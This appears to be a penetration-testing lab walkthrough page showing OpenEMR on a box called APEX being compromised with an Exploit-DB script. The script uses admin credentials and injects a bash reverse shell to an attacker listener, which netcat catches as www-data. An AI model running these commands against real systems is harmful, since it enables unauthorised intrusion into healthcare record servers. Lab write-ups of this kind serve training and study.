7 :80 openemr exploit

# as all exploits need patient portal, we can enable it by
# Logged in > Administration > Globals > Portal > Enable Version 2 Onsite Patient Portal
# Tried many exploits for v5.0.1 - didn't work.

# Trying https://www.exploit-db.com/exploits/45161

$ python 45161.py http://192.168.137.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.49.137/445 0>&1'

$ nc -lvnp 445
listening on [any] 445 ...
connect to [192.168.49.137] from (UNKNOWN) [192.168.137.145] 34856
bash: cannot set terminal process group (1411): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
APEX
Previous8 box enum www-dataNext6 :3306 mysql

Last updated